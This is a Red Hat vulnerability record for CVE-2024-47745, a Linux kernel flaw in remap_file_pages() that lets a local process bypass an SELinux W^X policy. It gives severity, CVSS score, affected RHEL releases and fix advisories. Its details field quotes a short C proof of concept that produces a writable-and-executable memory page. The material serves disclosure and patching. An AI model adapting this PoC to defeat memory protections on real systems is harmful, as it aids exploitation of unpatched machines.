{ "threat_severity" : "Moderate", "public_date" : "2024-10-21T00:00:00Z", "bugzilla" : { "description" : "kernel: mm: call the security_mmap_file() LSM hook in remap_file_pages()", "id" : "2320248", "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2320248" }, "cvss3" : { "cvss3_base_score" : "4.7", "cvss3_scoring_vector" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "status" : "verified" }, "cwe" : "CWE-670", "details" : [ "In the Linux kernel, the following vulnerability has been resolved:\nmm: call the security_mmap_file() LSM hook in remap_file_pages()\nThe remap_file_pages syscall handler calls do_mmap() directly, which\ndoesn't contain the LSM security check. And if the process has called\npersonality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for\nRW pages, this will actually result in remapping the pages to RWX,\nbypassing a W^X policy enforced by SELinux.\nSo we should check prot by security_mmap_file LSM hook in the\nremap_file_pages syscall handler before do_mmap() is called. Otherwise, it\npotentially permits an attacker to bypass a W^X policy enforced by\nSELinux.\nThe bypass is similar to CVE-2016-10044, which bypass the same thing via\nAIO and can be found in [1].\nThe PoC:\n$ cat > test.c\nint main(void) {\nsize_t pagesz = sysconf(_SC_PAGE_SIZE);\nint mfd = syscall(SYS_memfd_create, \"test\", 0);\nconst char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,\nMAP_SHARED, mfd, 0);\nunsigned int old = syscall(SYS_personality, 0xffffffff);\nsyscall(SYS_personality, READ_IMPLIES_EXEC | old);\nsyscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);\nsyscall(SYS_personality, old);\n// show the RWX page exists even if W^X policy is enforced\nint fd = open(\"/proc/self/maps\", O_RDONLY);\nunsigned char buf2[1024];\nwhile (1) {\nint ret = read(fd, buf2, 1024);\nif (ret <= 0) break;\nwrite(1, buf2, ret);\n}\nclose(fd);\n}\n$ gcc test.c -o test\n$ ./test | grep rwx\n7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)\n[PM: subject line tweaks]", "A flaw was found in the remap_file_pages function in mm/mmap.c in the Linux kernel, where it does not properly restrict execute access. This vulnerability allows local users to bypass intended SELinux W^X policy restrictions." ], "statement" : "This issue affects the Linux kernel shipping with Red Hat Enterprise Linux 8 and 9.\nThis issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 7 and before.\nThis flaw breach confidentiality due to bypassing incorrect SELinux policy.\nRed Hat has assessed the severity as moderate for the following reasons.\n1.First, while the vulnerability allows a bypass of security enforcement (W^X via SELinux), it must be triggered under a narrow sequence: the process must use READ_IMPLIES_EXEC personality and then call remap_file_pages() on RW pages. That is not necessarily common in many workloads.\n2. Even if a bypass is possible, it does not necessarily guarantee full root escalation or total system compromise; the benefit depends on what code or memory segments can be manipulated, if at all.", "affected_release" : [ { "product_name" : "Red Hat Enterprise Linux 9", "release_date" : "2025-05-13T00:00:00Z", "advisory" : "RHSA-2025:6966", "cpe" : "cpe:/a:redhat:enterprise_linux:9", "package" : "kernel-0:5.14.0-570.12.1.el9_6" }, { "product_name" : "Red Hat Enterprise Linux 9", "release_date" : "2025-05-13T00:00:00Z", "advisory" : "RHSA-2025:6966", "cpe" : "cpe:/o:redhat:enterprise_linux:9", "package" : "kernel-0:5.14.0-570.12.1.el9_6" }, { "product_name" : "Red Hat Enterprise Linux 9.2 Extended Update Support", "release_date" : "2025-05-15T00:00:00Z", "advisory" : "RHSA-2025:7683", "cpe" : "cpe:/a:redhat:rhel_eus:9.2", "package" : "kernel-0:5.14.0-284.117.1.el9_2" }, { "product_name" : "Red Hat Enterprise Linux 9.2 Extended Update Support", "release_date" : "2025-05-15T00:00:00Z", "advisory" : "RHSA-2025:7676", "cpe" : "cpe:/a:redhat:rhel_eus:9.2::nfv", "package" : "kernel-rt-0:5.14.0-284.117.1.rt14.402.el9_2" }, { "product_name" : "Red Hat Enterprise Linux 9.4 Extended Update Support", "release_date" : "2025-05-06T00:00:00Z", "advisory" : "RHSA-2025:4509", "cpe" : "cpe:/a:redhat:rhel_eus:9.4", "package" : "kernel-0:5.14.0-427.67.1.el9_4" } ], "package_state" : [ { "product_name" : "Red Hat Enterprise Linux 6", "fix_state" : "Out of support scope", "package_name" : "kernel", "cpe" : "cpe:/o:redhat:enterprise_linux:6" }, { "product_name" : "Red Hat Enterprise Linux 7", "fix_state" : "Out of support scope", "package_name" : "kernel", "cpe" : "cpe:/o:redhat:enterprise_linux:7" }, { "product_name" : "Red Hat Enterprise Linux 7", "fix_state" : "Out of support scope", "package_name" : "kernel-rt", "cpe" : "cpe:/o:redhat:enterprise_linux:7" }, { "product_name" : "Red Hat Enterprise Linux 8", "fix_state" : "Will not fix", "package_name" : "kernel", "cpe" : "cpe:/o:redhat:enterprise_linux:8" }, { "product_name" : "Red Hat Enterprise Linux 8", "fix_state" : "Will not fix", "package_name" : "kernel-rt", "cpe" : "cpe:/o:redhat:enterprise_linux:8" }, { "product_name" : "Red Hat Enterprise Linux 9", "fix_state" : "Will not fix", "package_name" : "kernel-rt", "cpe" : "cpe:/o:redhat:enterprise_linux:9" } ], "references" : [ "https://www.cve.org/CVERecord?id=CVE-2024-47745\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-47745\nhttps://lore.kernel.org/linux-cve-announce/2024102111-CVE-2024-47745-42e6@gregkh/T" ], "name" : "CVE-2024-47745", "mitigation" : { "value" : "The issue exists if SELinux W^X policy restrictions are being used.", "lang" : "en:us" }, "csaw" : false }